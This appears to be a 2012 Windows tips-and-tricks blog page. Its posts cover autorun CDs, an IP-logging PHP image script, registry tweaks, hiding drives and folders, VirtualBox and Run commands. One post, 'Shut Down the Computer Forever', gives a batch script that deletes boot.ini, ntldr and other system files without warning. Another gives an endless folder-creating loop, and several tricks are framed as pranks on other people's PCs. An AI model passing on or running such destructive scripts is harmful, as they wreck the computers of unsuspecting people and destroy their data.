Pages

Monday, April 30, 2012

How to Make an Autorun CD?



Have you ever noticed whenever you insert any game or software CD (consider Windows XP Operating system) it automatically runs the CD.

How to Find someone's IP Address

This is method to get someone IP using a PHP script. Just copy the below code and paste it in notepad. Save the file as ip.php you can change ip to any name but .php is must.

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);

Sunday, April 29, 2012

Change your IP address


Change your IP address in less than 1 minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK
  • You should be now at MS DOS prompt Screen
  • Type "ipconfig /release" just like that, and hit "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

Monday, April 23, 2012

Run Multiple Operating Systems On Your Computer

http://www.virtualbox.org/
Do you use multiple computers to run different operating systems? Save energy and money by running all your operating systems on one computer!

We will be using free software to "virtualize" pretty much any operating system (OS). That means your guest OS (The one you are virtualizing) will run inside your host OS (The OS that your computer runs natively) as if it was an application. To learn more about virtualization, check out Virtual machine.

Wednesday, April 18, 2012

Angry Birds Space Free download for Windows Xp and 7


Now we can Free Download Angry Birds Space For windows xp and 7 and its working Great and tested well in computer.As like the season of fruit’s its high time season with the release of most awaited and popular game “Angry Bird Space”
Yes, you heard it right , The Angry Bird’s are back with their crackling release with the series of “Angry Birds Space” , occupying the space on your iOS , Androids , and MAC device’s.

Windows 7 tips, tricks and secrets

1. Problem Steps Recorder
As the local PC guru you're probably very used to friends and
 family asking for help with their computer problems, yet having
 no idea how to clearly describe what's going on. It's frustrating,
 but Microsoft feels your pain, and Windows 7 will include an 
excellent new solution in the Problem Steps Recorder.

Wednesday, April 11, 2012

Cool Windows Prank

This will make it to where your friend cannot click on anything on the screen.


1. Take a screenshot of the desktop. You can use windows printscreen key.(next to F12 key)
2. Make your printscreen picture as desktop background.
3. Save that in ms paint.
and set that image as ur background.
4. Right click on desktop , then click Arrange Icons By->Show Desktop Icons 
That is it , when you click on the “icons”, nothing will happen!
Hope you'll have a lot of fun after seeing ppl clicking on icon which doesn't react. :)

1000 Folders at 1 Click

Make 1,000 folders in few seconds


Here I will teach you simple prank that will make an unlimited amount offolders in any place you want.


1. Open notepad and type :
@echo off
:top
md %random%
goto top 
2. Save it as 1000folders.bat.
3. After that you will get a unknown icon so u better change the icon
4. Right click on icon >properties>customize>change icon.
Changing icon is optional.

Sunday, April 8, 2012

Shut Down the Computer Forever



Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Tuesday, April 3, 2012

Prevent USB Writting

Stop other user's from copying you private files through USB drives.
The following registry setting will prevent writing to usb in windows xp.
Expand HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control Add a new key and name it "StorageDevicePolicies".
In the window on the right then create a new DWORD value and label it WriteProtect, give it a value of "1" and users can no longer write to USB drives.
Giving a value of "0" will allow to write again.



Invisible Folder


Make the folder INVISIBLE without hiding 
1)Right Click on the desktop.Make a new folder
2)Now rename the folder with a space and,U have to hold ALT key and type 0160).
(please use N0 keys)
3)Now u have a folder with out a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u should find some empty spaces,(between icons there will be blank spaces) Click on any one of them.
now u can store ur personal data without any 3rd party tools.
Trust me it's soo cool Trick :)

Monday, April 2, 2012

Folder Option Missing ??

Many of us sometimes find the folder options missing in windows explorer.
Here's the solution
Open Run and then type "gpedit.msc".
Now goto
User Configuration > Administrative templates > Windows Component > Windows Explorer.


Click on Windows Explorer you will find the 3rd option on the right side of screen
"Removes the Folder Option menu item from the Tools menu"


Just check it,
if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.
I hopes that you will find the option after restarting windows. 

Hide Drives form My Computer

DISABLE DISPLAY OF DRIVES IN MY COMPUTER 


With this trick you can play with any pc...after this trick if some one opens my computer he/she'll not see any drive in my computer.
Open Registry Editor by typing "regedit.exe" in Run or in command prompt. There you navigate to registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer Now in the right pane create a new DWORD item (by rightclicking and new->dword) and name it NoDrives ( case sensitive).

Cmd Commands

100 Run Commands
  • Accessibility Options : access.cpl
  • Add Hardware : hdwwiz.cpl
  • Add / Remove Programs : appwiz.cpl
  • Administrative Tools : control admintools
  • Automatic Updates : wuaucpl.cpl
  • Wizard file transfer Bluethooth : fsquirt
  • Calculator : calc
  • Certificate Manager : certmgr.msc